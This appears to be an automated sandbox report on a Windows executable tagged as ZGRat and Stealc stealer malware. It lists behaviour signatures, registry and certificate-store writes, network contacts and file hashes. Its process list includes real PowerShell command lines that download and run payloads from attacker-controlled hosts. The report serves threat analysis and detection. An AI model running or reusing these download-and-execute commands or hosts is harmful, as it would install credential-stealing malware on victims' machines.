Analysis Overview
SHA256
3b73d0b40752af41cdaa397c87f039167f0a1c9ff8ea6623fc8a8cb4ca787ca7
Threat Level: Known bad
The file 3b73d0b40752af41cdaa397c87f039167f0a1c9ff8ea6623fc8a8cb4ca787ca7.exe was found to be: Known bad.
Malicious Activity Summary
Detect ZGRat V1
ZGRat
Stealc
Blocklisted process makes network request
Downloads MZ/PE file
Reads data files stored by FTP clients
Executes dropped EXE
Reads user/profile data of web browsers
Checks computer location settings
Loads dropped DLL
Checks installed software on the system
Accesses cryptocurrency files/wallets, possible credential harvesting
Command and Scripting Interpreter: PowerShell
Unsigned PE
Enumerates physical storage devices
Program crash
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
Checks SCSI registry key(s)
Checks processor information in registry
Suspicious use of SendNotifyMessage
Modifies system certificate store
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-05-10 08:26
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-10 08:26
Reported
2024-05-10 08:29
Platform
win7-20231129-en
Max time kernel
135s
Max time network
138s
Command Line
Signatures
Detect ZGRat V1
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Stealc
ZGRat
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\i1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u248.0.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u248.1.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\3b73d0b40752af41cdaa397c87f039167f0a1c9ff8ea6623fc8a8cb4ca787ca7.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\i1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\i1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\i1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\i1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\i1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\i1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\i1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\i1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u248.0.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u248.0.exe | N/A |
Reads data files stored by FTP clients
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Checks installed software on the system
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\u248.1.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\u248.1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\u248.1.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\u248.0.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\u248.0.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6 | C:\Users\Admin\AppData\Local\Temp\3b73d0b40752af41cdaa397c87f039167f0a1c9ff8ea6623fc8a8cb4ca787ca7.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 0f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a953000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f0067006900650073000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e41d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca62000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd | C:\Users\Admin\AppData\Local\Temp\3b73d0b40752af41cdaa397c87f039167f0a1c9ff8ea6623fc8a8cb4ca787ca7.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 19000000010000001000000044ba5fd9039fc9b56fd8aadccd597ca6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca61d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e4090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f006700690065007300000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a92000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd | C:\Users\Admin\AppData\Local\Temp\3b73d0b40752af41cdaa397c87f039167f0a1c9ff8ea6623fc8a8cb4ca787ca7.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 040000000100000010000000a923759bba49366e31c2dbf2e766ba870f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a953000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f0067006900650073000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e41d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca619000000010000001000000044ba5fd9039fc9b56fd8aadccd597ca62000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd | C:\Users\Admin\AppData\Local\Temp\3b73d0b40752af41cdaa397c87f039167f0a1c9ff8ea6623fc8a8cb4ca787ca7.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A | C:\Users\Admin\AppData\Local\Temp\3b73d0b40752af41cdaa397c87f039167f0a1c9ff8ea6623fc8a8cb4ca787ca7.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 0f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6500b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030106082b0601050507030206082b0601050507030406082b06010505070303140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e71d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a2000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794 | C:\Users\Admin\AppData\Local\Temp\3b73d0b40752af41cdaa397c87f039167f0a1c9ff8ea6623fc8a8cb4ca787ca7.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 190000000100000010000000fd960962ac6938e0d4b0769aa1a64e26030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a1d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e709000000010000002a000000302806082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030353000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f00720069007400790000000f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6502000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794 | C:\Users\Admin\AppData\Local\Temp\3b73d0b40752af41cdaa397c87f039167f0a1c9ff8ea6623fc8a8cb4ca787ca7.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u248.1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u248.1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u248.1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u248.1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u248.1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u248.1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u248.1.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u248.1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u248.1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u248.1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u248.1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u248.1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u248.1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u248.1.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\3b73d0b40752af41cdaa397c87f039167f0a1c9ff8ea6623fc8a8cb4ca787ca7.exe
"C:\Users\Admin\AppData\Local\Temp\3b73d0b40752af41cdaa397c87f039167f0a1c9ff8ea6623fc8a8cb4ca787ca7.exe"
C:\Windows\SysWOW64\cmd.exe
"cmd" /c "C:\Users\Admin\AppData\Local\Temp\nsy501.tmp\est.bat"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d2iv78ooxaijb6.cloudfront.net/load/th.php?a=2836&c=1000','stat')"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d2iv78ooxaijb6.cloudfront.net/load/dl.php?id=425&c=1000','i1.exe')"
C:\Users\Admin\AppData\Local\Temp\i1.exe
i1.exe /SUB=2838 /str=one
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "$cli = New-Object System.Net.WebClient;$cli.Headers['User-Agent'] = 'InnoDownloadPlugin/1.5';$cli.DownloadFile('https://d2iv78ooxaijb6.cloudfront.net/load/dl.php?id=444&c=1000', 'i2.bat')"
C:\Users\Admin\AppData\Local\Temp\u248.0.exe
"C:\Users\Admin\AppData\Local\Temp\u248.0.exe"
C:\Users\Admin\AppData\Local\Temp\u248.1.exe
"C:\Users\Admin\AppData\Local\Temp\u248.1.exe"
C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
"C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | d235izp073r941.cloudfront.net | udp |
| GB | 108.156.50.188:443 | d235izp073r941.cloudfront.net | tcp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| US | 8.8.8.8:53 | d2iv78ooxaijb6.cloudfront.net | udp |
| GB | 108.156.32.179:443 | d2iv78ooxaijb6.cloudfront.net | tcp |
| GB | 108.156.32.179:443 | d2iv78ooxaijb6.cloudfront.net | tcp |
| DE | 185.172.128.59:80 | 185.172.128.59 | tcp |
| GB | 108.156.32.179:443 | d2iv78ooxaijb6.cloudfront.net | tcp |
| US | 8.8.8.8:53 | 240429000936002.mjt.kqri92.top | udp |
| BG | 94.156.35.76:80 | 240429000936002.mjt.kqri92.top | tcp |
| DE | 185.172.128.90:80 | 185.172.128.90 | tcp |
| DE | 185.172.128.228:80 | 185.172.128.228 | tcp |
| DE | 185.172.128.59:80 | 185.172.128.59 | tcp |
| DE | 185.172.128.228:80 | 185.172.128.228 | tcp |
| DE | 185.172.128.150:80 | 185.172.128.150 | tcp |
| US | 8.8.8.8:53 | svc.iolo.com | udp |
| US | 20.157.87.45:80 | svc.iolo.com | tcp |
| US | 8.8.8.8:53 | download.iolo.net | udp |
| FR | 185.93.2.245:80 | download.iolo.net | tcp |
| US | 20.157.87.45:80 | svc.iolo.com | tcp |
| US | 8.8.8.8:53 | westus2-2.in.applicationinsights.azure.com | udp |
| US | 20.9.155.148:443 | westus2-2.in.applicationinsights.azure.com | tcp |
| US | 20.9.155.148:443 | westus2-2.in.applicationinsights.azure.com | tcp |
| US | 8.8.8.8:53 | westus2-2.in.applicationinsights.azure.com | udp |
| US | 20.9.155.150:443 | westus2-2.in.applicationinsights.azure.com | tcp |
| US | 20.9.155.150:443 | westus2-2.in.applicationinsights.azure.com | tcp |
| US | 8.8.8.8:53 | westus2-2.in.applicationinsights.azure.com | udp |
| US | 20.9.155.150:443 | westus2-2.in.applicationinsights.azure.com | tcp |
| US | 20.9.155.150:443 | westus2-2.in.applicationinsights.azure.com | tcp |
| US | 8.8.8.8:53 | westus2-2.in.applicationinsights.azure.com | udp |
| US | 20.9.155.148:443 | westus2-2.in.applicationinsights.azure.com | tcp |
| US | 20.9.155.148:443 | westus2-2.in.applicationinsights.azure.com | tcp |
| US | 8.8.8.8:53 | westus2-2.in.applicationinsights.azure.com | udp |
| US | 20.9.155.145:443 | westus2-2.in.applicationinsights.azure.com | tcp |
| US | 20.9.155.145:443 | westus2-2.in.applicationinsights.azure.com | tcp |
Files
\Users\Admin\AppData\Local\Temp\nsy501.tmp\INetC.dll
| MD5 | 40d7eca32b2f4d29db98715dd45bfac5 |
| SHA1 | 124df3f617f562e46095776454e1c0c7bb791cc7 |
| SHA256 | 85e03805f90f72257dd41bfdaa186237218bbb0ec410ad3b6576a88ea11dccb9 |
| SHA512 | 5fd4f516ce23fb7e705e150d5c1c93fc7133694ba495fb73101674a528883a013a34ab258083aa7ce6072973b067a605158316a4c9159c1b4d765761f91c513d |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
| MD5 | 29f65ba8e88c063813cc50a4ea544e93 |
| SHA1 | 05a7040d5c127e68c25d81cc51271ffb8bef3568 |
| SHA256 | 1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184 |
| SHA512 | e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa |
C:\Users\Admin\AppData\Local\Temp\Tar989.tmp
| MD5 | 435a9ac180383f9fa094131b173a2f7b |
| SHA1 | 76944ea657a9db94f9a4bef38f88c46ed4166983 |
| SHA256 | 67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34 |
| SHA512 | 1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357
| MD5 | 44e9e1d6dc80c5b5e584d3aa577be321 |
| SHA1 | 5e9d1bfb2808e1e01321061c76bcf9d9a4540175 |
| SHA256 | ed6c026c430b927ac595f4332ab753a8c992b94acb342f4ee69e6ad5c1aa42a7 |
| SHA512 | 92ccb6aff668e561e24afc455f511fc4225b022d020b0aae60bbd08a9912b861811074e3e2266945153f442758fe9a3656013fd1c1bd46dc5d0cd6b077f00620 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357
| MD5 | a266bb7dcc38a562631361bbf61dd11b |
| SHA1 | 3b1efd3a66ea28b16697394703a72ca340a05bd5 |
| SHA256 | df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e |
| SHA512 | 0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 6723f538befe59f54c68f1312a0d0635 |
| SHA1 | 54a3c0849273136209ffa4bddf800009b863ba44 |
| SHA256 | e5f1ef2e64c858dc470a20e9f18872a12f458739a743e2a5e38663fc26505bab |
| SHA512 | 6f265235c85e1168a699f2390935109fab796235bdc286e398de60e81f945064afc7b277a1bc727054ebaec9b0447ba33b77217e873f4873c92856187523203e |
C:\Users\Admin\AppData\Local\Temp\nsy501.tmp\est.bat
| MD5 | f32d05160acf8325e9a09f09f80d16f4 |
| SHA1 | 46e159b71e6ef99076c4002e1fda134e1d0a86c9 |
